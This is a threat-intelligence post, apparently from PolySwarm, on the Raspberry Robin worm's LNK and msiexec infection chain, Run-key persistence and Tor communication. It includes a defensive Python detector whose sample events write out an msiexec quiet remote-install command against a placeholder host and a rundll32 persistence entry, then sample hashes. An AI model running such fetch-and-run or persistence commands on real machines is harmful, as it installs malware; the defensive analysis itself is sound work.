
Raspberry Robin

Written by PolySwarm Tech Team | Aug 1, 2022 6:21:21 PM
Executive Summary

Cybereason recently reported on Raspberry Robin, a worm that uses LNK shortcuts to lure victims and leverages compromised QNAP devices as stagers.

Key Takeaways

  • Raspberry Robin is a worm associated with LNK Worm.
  • Raspberry Robin spreads via multiple methods, including LNK files, file archives, USB devices, and ISO files.
  • Raspberry Robin leverages QNAP devices as stagers.
  • Raspberry Robin uses process injection into legitimate Windows processes to evade detection.

What is Raspberry Robin?

Raspberry Robin is a worm associated with LNK Worm. The worm spreads over USB devices or shared folders, taking advantage of QNAP devices as stagers. It leverages LNK files, file archives, USB devices, and ISO files to infect victims. Most of the Raspberry Robin targets Cybereason observed were located in Europe.

The Raspberry Robin infection chain begins with two files placed on a shared drive or external device: an LNK file containing a Windows shell command, and a BAT file containing padding data and two commands. The LNK file triggers the initial infection: it executes cmd.exe, which launches msiexec.exe in quiet mode and normal installation mode. A second msiexec.exe process (msiexec.exe /V) is then launched from services.exe, and it in turn spawns a third msiexec.exe process that loads a malicious module, the malware stage. The malware uses the msiexec.exe LOLBin to download and execute a malicious DLL file hosted on a compromised QNAP device.

Once a machine is infected, Raspberry Robin maintains persistence by running on startup: a registry run key automatically loads the malicious module through rundll32.exe. In one of the samples analyzed by Cybereason, the module masqueraded as an Apache shared library file, libapriconv-1.dll. In another sample, the module masqueraded as the QT 5 process. That module carried a code signature that the Windows system did not verify; the code signing name used in that sample was OmniContact.

To evade detection, Raspberry Robin uses process injection into legitimate Windows system processes and uses Tor exit nodes to communicate with threat actor infrastructure over ports 80, 443, and 8080.
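The two host-side behaviours described above (cmd.exe launching msiexec.exe in quiet/install mode against a remote package, and a Run key that loads a DLL through rundll32.exe) are the kind of thing a detection engineer turns into process-tree and registry rules. The following is an added example, written for this page and not code from PolySwarm or Cybereason. It assumes Sysmon-style process-creation and registry events flattened into dicts, and it interprets "quiet mode" and "normal installation mode" as the msiexec.exe /q and /i switches; every PID, path and the http://example.invalid URL in the sample events is constructed for the example, and only the DLL name libapriconv-1.dll is taken from the post.

```python
import re
from dataclasses import dataclass

# Constructed sample events in a Sysmon-like shape (process creation + registry value set).
# PIDs, paths and the http://example.invalid URL are placeholders invented for this example;
# libapriconv-1.dll is the masquerade name the post mentions.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 3990, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "command_line": "explorer.exe"},
    {"type": "process", "pid": 4012, "ppid": 3990, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'cmd.exe /c msiexec /q /i "http://example.invalid/pkg.msi"'},
    {"type": "process", "pid": 4020, "ppid": 4012, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'msiexec /q /i "http://example.invalid/pkg.msi"'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Updater",
     "value_data": r'rundll32.exe "C:\Users\Public\libapriconv-1.dll",Start'},
    # Benign noise: a vendor installer running msiexec on a local package, and an ordinary Run value.
    {"type": "process", "pid": 5100, "ppid": 5000, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Program Files\Vendor\setup.exe",
     "command_line": r'msiexec /i "C:\Users\alice\Downloads\tool.msi" /qn'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "OneDrive",
     "value_data": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
QUIET_RE = re.compile(r"(?:^|\s)[/-]q[nbrf]*\b", re.IGNORECASE)   # /q, /qn, /qb ...
INSTALL_RE = re.compile(r"(?:^|\s)[/-]i\b", re.IGNORECASE)
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)', re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, so image comparisons ignore directory and case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    rule: str
    detail: str


def check_msiexec_remote_quiet_install(ev: dict):
    """msiexec.exe started by cmd.exe in quiet (/q) and install (/i) mode with an http(s)
    package source: the LNK -> cmd.exe -> msiexec.exe stage the post describes."""
    if ev.get("type") != "process" or basename(ev["image"]) != "msiexec.exe":
        return None
    cl = ev["command_line"]
    if (basename(ev["parent_image"]) == "cmd.exe" and QUIET_RE.search(cl)
            and INSTALL_RE.search(cl) and URL_RE.search(cl)):
        return Finding("msiexec_remote_quiet_install", f"pid {ev['pid']}: {cl}")
    return None


def check_run_key_rundll32(ev: dict):
    """A Run key value that loads a DLL through rundll32.exe from outside the Windows
    directory: the startup persistence the post describes."""
    if ev.get("type") != "registry" or not ev["key"].lower().endswith(r"\currentversion\run"):
        return None
    m = RUNDLL_RE.search(ev["value_data"])
    if m and not m.group(1).lower().startswith("c:\\windows\\"):
        return Finding("run_key_rundll32_user_path",
                       f"{ev['key']}\\{ev['value_name']} -> {m.group(1)}")
    return None


RULES = [check_msiexec_remote_quiet_install, check_run_key_rundll32]


def lineage(events, pid):
    """Walk ppid links back through the process events to show how a flagged process was reached."""
    by_pid = {e["pid"]: e for e in events if e.get("type") == "process"}
    chain = []
    while pid in by_pid:
        ev = by_pid[pid]
        chain.append(basename(ev["image"]))
        pid = ev["ppid"]
    return list(reversed(chain))


def scan(events):
    """Run every rule over every event and collect the findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            f = rule(ev)
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
    print("lineage of pid 4020:", " -> ".join(lineage(SAMPLE_EVENTS, 4020)))
```

Two deliberate omissions: the msiexec.exe /V process launched from services.exe is the Windows Installer service starting, which happens on every legitimate MSI install, so it is only useful as corroborating context for a cmd.exe-launched remote install rather than a rule on its own; and traffic on ports 80, 443 and 8080 is not flagged either, because those ports carry ordinary web traffic and Tor exit-node communication is better caught by matching destinations against a current exit-node list.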

IOCs

PolySwarm has multiple samples of Raspberry Robin.

699ad43a53a38e4cf613035b1fcaae94424bedd8d171d6a49828a589df6ea064

1d2c8db9ac6082f32e9178469c2c416e5e170095d7f84a771dbb91192c681598

1a5fcb209b5af4c620453a70653263109716f277150f0d389810df85ec0beac1

c0a13af59e578b77e82fe0bc87301f93fc2ccf0adce450087121cb32f218092c

You can use the following CLI command to search for all Raspberry Robin samples in our portal:

$ polyswarm link list -f RaspberryRobin
